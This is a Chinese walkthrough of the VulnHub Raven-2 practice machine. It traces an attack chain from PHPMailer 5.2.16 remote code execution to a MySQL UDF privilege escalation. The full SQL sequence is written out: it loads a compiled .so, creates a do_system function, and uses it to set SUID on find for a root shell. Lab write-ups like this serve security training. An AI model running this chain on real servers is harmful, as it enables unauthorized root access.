vulnhub靶场之Raven-2渗透笔记

靶机描述:

一、准备工作

kali和靶机都选择NAT模式（kali与靶机同网段）

1. 靶场环境

   下载链接:Raven: 2 ~ VulnHub

主机发现:

端口扫描:

访问默认端口:

点击BLOG的时候跳转到了wordpress的一个站点，点击内容查看的时候报错了

细心一点可以发现这是域名解析的问题，url由我们输入的ip地址变成了raven.local，我们需要做的是配置电脑的hosts文件，使域名解析到192.168.110.137

现在访问就正常了

扫描到很多东西,主要分为三个web信息目录

依次访问页面,在**http://raven.local/vendor/PATH目录下发现flag1

在vendor目录下的README.md里面看到了PHPMailer(一个功能齐全的PHP电子邮件创建和传输类)

在VERSION目录文件中得知PHPMailer版本号为5.2.16

PHPMailer < 5.2.18版本存在安全漏洞，可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码，远程控制目标web应用

将相关的脚本文件拷贝

修改脚本内容

然后监听本地端口

升级交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

使用find命令查找flag

成功找到flag2和flag3

查看flag2文件

flag3为图片,在网站下查看

登入mysql服务器，查看mysql版本信息

浏览器搜索关键字

看到可以使用udf提权
kali漏洞库搜索udf

这里使用1518.c
将1518.c下载到本地

-g 生成调试信息-c 编译（二进制）-shared：创建一个动态链接库，输入文件可以是源文件、汇编文件或者目标文件。-o：执行命令后的文件名-lc：-l 库 c库名

靶机将icepak.so下载到本地

进入数据库，发现是具有读和写的权限的

use mysql; #进入数据库create table foo(line blob); #创建数据表fooinsert into foo values(load_file('/tmp/icepeak.so')); #插入数据select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so'; #( Foo表成功插入二进制数据，然后利用dumpfile函数把文件导出outfile 多行导出，dumpfile一行导出outfile会有特殊的转换，而dumpfile是原数据导出新建存储函数)create function do_system returns integer soname 'icepeak.so'; #(创建自定义函数do_system 类型是integer，别名soname文件名字然后查询函数是否创建成功)select * from mysql.func;select do_system('chmod u+s /usr/bin/find'); #(调用do_system函数来给find命令所有者的suid权限，使其可以执行 root命令)quit

退出mysql，使用/usr/bin/find提权

可以看到权限已经为root了，切换其根目录，发现最后一个flag，Raven2靶机所有flag查找完毕，至此，Raven2靶机渗透结束

原文始发于微信公众号（网络安全学习爱好者）：vulnhub靶场之Raven-2渗透笔记